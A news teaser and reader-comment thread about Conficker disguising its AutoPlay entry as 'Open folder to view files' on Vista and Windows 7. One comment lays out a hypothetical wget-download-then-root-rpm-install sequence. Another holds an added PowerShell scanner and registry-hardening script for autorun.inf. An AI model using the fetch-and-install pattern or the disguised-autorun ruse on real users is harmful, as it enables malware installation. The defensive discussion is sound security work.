Conficker Autoplay ruse gets teeth into Windows 7

Social engineering autoplay tricks work on early versions of Windows 7 as well as Vista, according to tests by security researchers.

AutoPlay trickery

As well as spreading by exploiting a weeks-old Microsoft vulnerability, the Conficker (Downadup) worm attempts to spread across network shares and to infect removable drives …

COMMENTS

This topic is closed for new posts.
  1. Sam York

    Modify how Autoplay works?

    Hopefully they will just turn it off altogether. I always have, on any Windows system that's supported it.

    Is it really much hardship to put a CD/USB stick in, then navigate to it in My Computer to explore or open it? I think not.

  2. Jared Vanderbilt

    I'd like to announce Windows 8 at this time

    Windows 8 is the greatest thing since sliced bread. It also includes rudimentary security, unlike the previous 7 versions of Windows.

  3. Tom

    @Sam York

    But MS don't want you to find out how to use a computer* - if you do you might just stop using theirs

    * I've been on Administrator courses and that holds true with them too!

  4. Anonymous Coward

    Oooo, sneaky.

    I might have fallen for that.

  5. Anonymous Coward

    Just curious..

    Looking at the screen shot, underneath the added 'Open folder to view files' it says 'Publisher not specified'.

    Why didn't they add in Microsoft as a publisher to make the illusion more complete, or is that controlled by something else?

  6. Anonymous Coward

    IF

    IF you allow removable media and

    IF you allow autorun and

    IF your users have administrative rights and

    IF your users have the right to run unauthorised executables

    Then you don't deserve to be an administrator.

    IF all those things are allowed by default then you probably shouldn't be selling your OS to home users.

  7. mattbt

    quite easy

    It's actually quite easy to make it claim that the "open folder to view files" entry is from Microsoft Windows; I can probably post a screenshot.

    It was part of my coursework project last year, only mine didn't infect a computer with a virus...

  8. Nick Askew

    Perhaps

    Windows 7 could, upon clicking on such an icon, send the screen kind of dark and pop up a message saying 'open folder to view files' needs your permission to continue ....

    I'll get my coat

  9. Kanhef

    Possible solution

    Have a single 'install or run program' option, with a suitable generic icon. Selecting that brings up a new window, which is where any programs the device offers to run are listed. Separating programs on the USB drive (or whatever) from normal Windows services should keep this sort of trick from working.

    This is a clever idea for a virus. Relatively savvy users often click on 'open folder...' without reading the entire window, and could easily choose the wrong one. If it opens the appropriate folder view after installing itself, it would be very hard to notice that anything unusual happened.

  10. Ash

    6 of one...

    This is a mix of three things:

    - Microsoft's ineptitude when it comes to basic security

    - Administrators' ineptitude in securing their kit properly

    - Users' ineptitude in not reading the line above the icon, which states quite clearly "Install or Run Program"

    ID 10T error all around.

  11. Anonymous Coward

    Before fanbuys kick off...

    On a fresh install of Ubuntu, if I whack in a video clip it doesn't recognise, it says "Codec not found, do you want to find one?" Duuur OK

    Then I get do you want to install? Duuurrr OK

    And hey presto, I've blindly clicked a few links and installed something called a codec and clicked ok a few times and away it went and played my video.

    granted it may of copied my entire hard drive to a guy in botswana, but hey, this video is Keewwlll.

    If you make something easy to use, it becomes easy to trick people.

  12. Anonymous Coward

    @AC: Before fanbuys kick off...

    Apart from the fact that a default install of Ubuntu will only fetch the required software from the Ubuntu repositories, your argument does in fact hold water.

    The problem is that the argument holds such a small amount of water, an ant may dehydrate if relying on it!

  13. Stuart Castle

    Why bother with Autorun

    Why do Microsoft persist with this idea that Autorun should be enabled by default?

    Yes, it makes things a little easier for the public (no having to hunt for something to run on the disc), but it also makes things a lot easier for Virus and Trojan writers. They just (as has been done here) make their Virus/Trojan look like a standard Windows option.

    So, Microsoft have introduced a massive security hole to reduce the number of mouse clicks to run a program from two or three to one.. Bargain..

    Hell, even Apple had the sense to remove Autorun support from Mac OS.

  14. Colin Millar

    open folder = run

    But then windows will say "Do you want to run this prog" - so you know you are about to run a prog

    Unless you ticked the box to never ask you this question - in which case you deserve to be conficked

    2 things to kick out of windows

    1) Autoplay - some kind of automount maybe but not autoexecute

    2) The ability to turn off really important warnings like - confirm this executable is to run

  15. David Simpson

    Anti-virus ?

    so an active virus scanner doesn't detect this ? hmmm

  16. Anonymous Coward

    @AC Re: @AC: Before fanbuys kick off...

    "a default install of Ubuntu will only fetch the required software from the Ubuntu repositories"

    And a default install of Windows will only fetch updates from updates.microsoft.com

    Doesn't mean that a program that autoruns and presents prompts that match the OS would have to abide by those rules.

    I believe that AC @ 15:56 was making the point that prompts that look like the OS don't necessarily originate from the OS.

    It's because of people like AC @ 16:35 that we have these problems in the first place... assuming the OS will protect you is a very bad assumption!

    The only way to be sure that your computer can't be infected is to leave the power off.

  17. Ken Hagan

    Is it just me...

    ...or is that dialog missing a big and ever-present "Don't do anything." option?

    I can imagine that Microsoft, or someone similarly deluded, might want to allow "custom actions", and I can imagine that the "close" box in the top right corner might have the effect I want, but surely it violates every UI guideline ever written to omit the "do nothing" or "go away" option here. Are new versions of Windows really this bad?

  18. Tone

    Just curious..

    Why didn't they add in Microsoft as a publisher to make the illusion more complete, or is that controlled by something else?

    They would need a microsoft certificate to do that..

  19. Anonymous Coward

    User Access Control

    It's finally useful for something!

    @@AC: Before fanbuys kick off..

    Doesn't matter how secure your OS, users are still going to press the buttons the computer tells them to. And since the OS does only install with the minimum there will be a lot of "You will need this as well" and users will get used to installing things like this

  20. James

    Autorun == epic fail

    Autorun is possibly the most retarded idea in computing history. No software should ever automatically run *anything* from an untrusted source. If it's not a permanently installed piece of hardware then it's untrusted.

    M$ and admins should get a clue and disable it permanently.

  21. Fluffykins

    @ AC ("Before fanbuys kick off... ")

    "it may of copied"

    of?

    OF?

    Do you mean "May've", as a contraction of "may have"?

  22. Anonymous Coward

    Simpler yet

    Either get the autorun.inf to deliver the payload direct (why give the choice?) or try an executable file that has a folder icon. The general user population won't have "hide known extensions" disabled and so would never see the .exe

    This is barely news. Not much more than "click me, I'm funny.exe"

  23. Roger Heathcote

    @David Simpson

    "so an active virus scanner doesn't detect this ? hmmm"

    HAhahahahaaaaaaa, that's too funny...

    Like the VXers don't use services like http://www.virustotal.com/ to make sure their zero days remain zero day for as long as possible.

    Antivirus is to infection prevention what the withdrawal method is to contraception yet people treat it like a magic cloak of invincibility and are baffled when they get spyware after surfing pron all day. More education needed.

  24. RW

    Ubuntu repositories

    One difference from Microsoft.com: the Ubuntu repositories contain not just the OS, but most of the applications as well.

  25. UBfusion

    Take precautions now!

    The best recommendations I have found so far is from the Canadian Cyber Incident Response Centre (CCIRC): http://www.publicsafety.gc.ca/prg/em/ccirc/2008/in08-007-eng.aspx

    The main idea is not only to prevent Windows from executing autorun.inf, but even *reading* it!
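
The following PowerShell is an added example, not code from the article, from CCIRC or from any commenter. It ties together the two threads above: the disguise (an autorun.inf whose "action" label and borrowed shell32.dll folder icon make the "Install or run program" entry look like "Open folder to view files", or an .exe with a folder icon on a box that hides known extensions) and the fix UBfusion points at (stop the shell from reading autorun.inf at all). The function names and the regex patterns used to flag a deceptive label are this example's own choices; the registry locations (NoDriveTypeAutoRun under Policies\Explorer, the IniFileMapping\Autorun.inf redirection, HideFileExt) are the documented ones. One caveat a practitioner will want: NoDriveTypeAutoRun alone was not reliably honoured on XP and Vista until Microsoft's fix described in KB967715, which is why the "never parse the file" mapping was the recommendation of the day.

```powershell
<#
  Added example. Two hypothetical helpers:
  - Get-RemovableAutorunFindings: parses autorun.inf on removable/optical drives
    and flags entries dressed up as built-in AutoPlay actions (the Conficker ruse);
  - Disable-AutorunSystemWide: applies the registry hardening discussed above.
  Run the hardening function from an elevated PowerShell session.
#>

function Read-AutorunInf {
    param([Parameter(Mandatory)][string]$Path)
    # Windows honours only the [autorun] section and ignores lines that are not
    # key=value pairs, which is why Conficker padded its file with junk bytes.
    $keys = @{}
    $inAutorun = $false
    foreach ($raw in Get-Content -LiteralPath $Path -ErrorAction Stop) {
        $line = $raw.Trim()
        if ($line -match '^\[(.+)\]$') {
            $inAutorun = ($Matches[1] -ieq 'autorun')
            continue
        }
        if ($inAutorun -and $line -match '^([A-Za-z0-9_]+)\s*=\s*(.*)$') {
            $keys[$Matches[1].ToLowerInvariant()] = $Matches[2].Trim()
        }
    }
    return $keys
}

function Test-AutorunDeception {
    param([hashtable]$Keys)
    $findings = @()
    # "action" is the label shown for the entry; Conficker used "Open folder to view files".
    if ($Keys['action'] -and $Keys['action'] -match 'open folder|view files|published by|microsoft') {
        $findings += "action label mimics a built-in entry: '$($Keys['action'])'"
    }
    # A folder icon lifted from shell32.dll completes the disguise.
    if ($Keys['icon'] -and $Keys['icon'] -match 'shell32\.dll') {
        $findings += "icon borrowed from shell32.dll: '$($Keys['icon'])'"
    }
    # These keys name what actually runs when the user clicks the entry.
    foreach ($k in 'open', 'shellexecute') {
        if ($Keys[$k]) { $findings += "$k launches: '$($Keys[$k])'" }
    }
    return ,$findings
}

function Get-RemovableAutorunFindings {
    # Win32_LogicalDisk DriveType: 2 = removable disk, 5 = CD-ROM.
    foreach ($disk in Get-CimInstance Win32_LogicalDisk -Filter 'DriveType=2 OR DriveType=5') {
        $inf = Join-Path $disk.DeviceID 'autorun.inf'
        if (-not (Test-Path -LiteralPath $inf)) { continue }
        [pscustomobject]@{
            Drive    = $disk.DeviceID
            Findings = Test-AutorunDeception -Keys (Read-AutorunInf -Path $inf)
        }
    }
}

function Disable-AutorunSystemWide {
    # 1. NoDriveTypeAutoRun = 0xFF disables AutoRun for every drive type.
    #    Caveat: XP/Vista without the KB967715 fix did not honour this reliably.
    $pol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    New-Item -Path $pol -Force | Out-Null
    Set-ItemProperty -Path $pol -Name 'NoDriveTypeAutoRun' -Value 0xFF -Type DWord

    # 2. Map autorun.inf INI lookups to a registry key that does not exist, so the
    #    shell never parses the file at all, whatever it contains.
    $map = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf'
    New-Item -Path $map -Force | Out-Null
    Set-ItemProperty -Path $map -Name '(default)' -Value '@SYS:DoesNotExist' -Type String

    # 3. Show extensions for the current user, so "Photos.exe" with a folder icon
    #    cannot pass for a folder in Explorer.
    $adv = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
    Set-ItemProperty -Path $adv -Name 'HideFileExt' -Value 0 -Type DWord
}

# Usage: report first, then harden (the second call needs an elevated session).
Get-RemovableAutorunFindings | Format-List
# Disable-AutorunSystemWide
```

The scan is a triage aid rather than detection: a clean autorun.inf that simply launches a vendor installer also trips the "open"/"shellexecute" lines, and the label patterns are easy to sidestep. The hardening is what actually removes the click-me entry, and the IniFileMapping redirection does so even on a machine whose NoDriveTypeAutoRun handling is not patched.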

  26. zenkaon

    @AC 15:56 - ubuntu comments

    People seem to be missing the biggest difference. In Vista, UAC will come on and you click continue and download your whatever - just another button to click. In Ubuntu, before it gets the codec it will ask you for your password. This is because Ubuntu out-of-the-box does not let you log in as root (admin) and you need sudo access to install things/modify system settings.

    All home users of Vista I have ever seen just get pissed off with UAC as it is meaningless and just another button to click. Pretty much all home users log in as root (admin). Hey, at least in Windows 7 you can turn UAC off.

    It doesn't surprise me this worm works in Windows 7 - it's basically a faster Vista with a bit of a KDE taskbar and no UAC. MS have to keep backwards compatibility and hence their architecture won't ever change that much, hence viruses will continue into Windows 2020 and beyond.

  27. Anonymous Coward

    Non-issue

    So they've renamed the autorun thing to look like "Open files or folders" woo, aren't they clever.

    And when some dumbs**t user drops their ignorance onto the mouse button and clicks it, UAC will popup saying "this program is attempting to modify your system", then when dumbs**t user thinks that is normal they confirm UAC, and then when dumbs**t user presses "continue" their machine gets roasted.

    The fact it's titled as a "social engineering" trick says something. All IT systems are vulnerable to social engineering, regardless of their security practices; some users will trust anything.

    How many people have added repositories to Linux at the urging of a forum or webpage without fully checking the repository is legit? How many Windows converts to Linux would follow these instructions to the word if they've been told it'll give them a fun spinning cube with extra effects than their default repository version provides?

    1. wget http://www.somesite.com/repository.rpm

    2. su - c "rpm -Uvh repository.rpm"

    3. yum install this-is-not-a-virus-honest-gov

    Where's the story on that "vulnerability"? People who get infected with crap like this deserve more than they get, they deserve their BIOS flashed and to be removed from the computer user population.

    A few PCs later and they'll soon start learning computer security is as important as locking their car.

  28. Anonymous Coward

    Microsoft bitching

    "So, Microsoft have introduced a massive security hole to reduce the number of mouse clicks to run a program from two or three to one.. Bargain.."

    Hmm, so it's Microsoft's fault that the user has clicked on a link that looks like it opens the folder, but in fact is surrounded by text saying "Install or run program" and "Publisher not specified", and is in a separate section to the real link.

    There's nothing wrong with autorun in Vista. Users just need to pay more attention to what they're doing. OS manufacturers can't protect you from every eventuality - you have to take personal responsibility as well. And it's worth mentioning that UAC and running as a standard user would protect against losing your entire system.

  29. Test Man

    New pic

    There's a new pic on BBC News showing the Autorun dialog. This time, the second line says "Published by Microsoft Windows". Now obviously it would never say anything like that if it came from Microsoft but it would definitely catch a lot of people out, even some of the more knowledgeable ones. Take a look.

    http://news.bbc.co.uk/1/hi/technology/7842013.stm

    Image is at http://newsimg.bbc.co.uk/media/images/45397000/jpg/_45397705_windows_vista_open_folder_to_view_files.jpg

    I'd like to know how they got text in that second line. I assumed that the executable had to be signed to get it in there, which you wouldn't normally be able to do if you were a dodgy virus writer.

  30. JC

    @ Microsoft bitching

    There certainly is something wrong with autorun when the average PC user, thinking their own flash drive is a trusted source, is allowed to infect the system via the default actions of an operating system specifically marketed for improved security.

    MS has done what they always do, add more things to click that annoy and slow down general computing, instead of disabling insecure features out of the box so that only those savvy enough to be mindful of what they've actively enabled, will be those who seek out and enable that feature.

    You really shouldn't have to take responsibility for clicking on what the OS pops up, it should not pop up any self-destruct buttons at all! It's like putting a "dump the oil pan" button in a car then not labeling it, with your mechanic arguing that anyone should take the time to trace that button through the dash to see that it's wired to a valve under the car, regardless of what the button is labeled to do, like "open trunk"... or folder in this case.

    Stop making excuses for defective software. Windows is targeted at the noobs, the interface changes speak volumes enough about that. With that target userbase, at the very least as much attention should be paid towards preventing self destruct buttons as the # of different looks for a clock on the sidebar.

    If you want autorun, by all means enable it from a default disabled setting.

  31. Owain

    re su - c "rpm -Uvh repository.rpm"

    It would take quite some social engineering to get me to type that in; or perhaps I could run the 100000 monkey-o-tron I keep next to my keyboard.

    Anyway, isn't that the noise somebody makes when they've got a really bad frog in their throat.

  32. Anonymous Coward

    @JC

    My point is that there's only so much you can do to protect users from themselves, and that Microsoft is blamed whenever any virus infects Windows through any method.

    As for talk about a self-destruct button, surely any program that can be run can do this? Should Windows stop you running programs? Hell, the file might be called "Watch Screensaver.exe". If it does anything other than run a screensaver then is it Microsoft's fault that Windows let it run?

    Autorun is a feature for "noobs", as you say. How many "noobs" are going to be able to navigate through a directory structure and run the correct program on the CD or flash drive? At least it's better than the old autorun, where the program just ran anyway.

    There's a line between usability and security, and I think that autorun is on the right side of that line. There are enough safeguards to protect most people (how many people have been fooled by this anyway?). If you're worried about users not understanding all this then maybe they should have to pass a test before they can use their computers?

  33. Dave

    usual unix shite

    It's always only a matter of time before some unix tosser posts a command line to prove how ultra-mega-super-intelligent they are, and thus simultaneously proving why it will never replace Windows as the OS of choice. Unfortunately, high levels of tosspottery in their system prevent them from comprehending this. That is the unix paradox: thou will never replace Windows until thy command line be gone... but how can thou prance superiorly about without thine command line?

  34. Anonymous Coward

    @ usual unix shite

    "That is the unix paradox: thou will never replace Windows until thy command line be gone... but how can thou prance superiorly about without thine command line?"

    I used to think that too, but as I have become more interested in alternatives to Microsoft OSes, I have found that many of the more established BSD/GNU-Linux communities don't want to replace Microsoft on the desktop, at least.

    I have to agree with some of the other people who have commented about this article that it is really up to the end-user to get off his/her lazy ass and learn something, or just don't own a computer or lose all your personal info to crims. Computers have been around long enough that people need to understand that they are not just another appliance. It's best to actually know something about the operation of the devices.

  35. Anonymous Coward

    Ralph Nader: Computers Unsafe at Any Speed?

    AC wrote, "I have to agree with some of the other people who have commented about this article that it is really up to the end-user to get off his/her lazy ass and learn something, or just don't own a computer or lose all your personal info to crims. Computers have been around long enough that people need to understand that they are not just another appliance. It's best to actually know something about the operation of the devices."

    Ideally, yes. However, computers aren't marketed that way - they're marketed towards people who are barely smart enough to not pee on the floor indoors.

    Such clueless users will learn how to use computers safely at the same rate that idiots will learn how to stop crashing their cars. "Seatbelts save lives", as the saying goes, but cars didn't used to have seatbelts until whiners like Ralph Nader started making a big public stink about auto safety, eventually resulting in the automotive industry doing things to save idiots from themselves (saving bad drivers, and non-defensive drivers, from some Darwinian justice).

    Maybe we need a Ralph Nader type to address computer-OS security concerns, to keep idiot lusers from being a menace to others on the internet.

    Since that's not likely to happen anytime soon, the idiocy will continue.

    Nevertheless, it's often hopeless trying to explain to the average home PC user why they shouldn't run as Admin, etc etc... - their attitude is, "Well, the PC was set up like that when I first bought it, so it *must* be right, why would I change it?" :(

    So I would like to see *some* changes in the MS default stuff. Not to protect idiots from themselves, but to protect the rest of us from the idiots... or something like that.

  36. Andrew Metzger

    Simple security measure

    I understand the "logic" behind Microsoft not wanting to disable autorun, but there's still a very simple security feature that could be added - don't show the program icon and name. Instead of tiny words that say "Install or run program" and a big, clickable icon of the program, the box should make big, clickable text that reads "Install or run program," and maybe a tiny icon with text underneath it.

    If you take control away from the programs that want to run, it takes away their ability to influence the user and other programs. Why should a program be allowed to put its icon in an OS-owned dialog box?
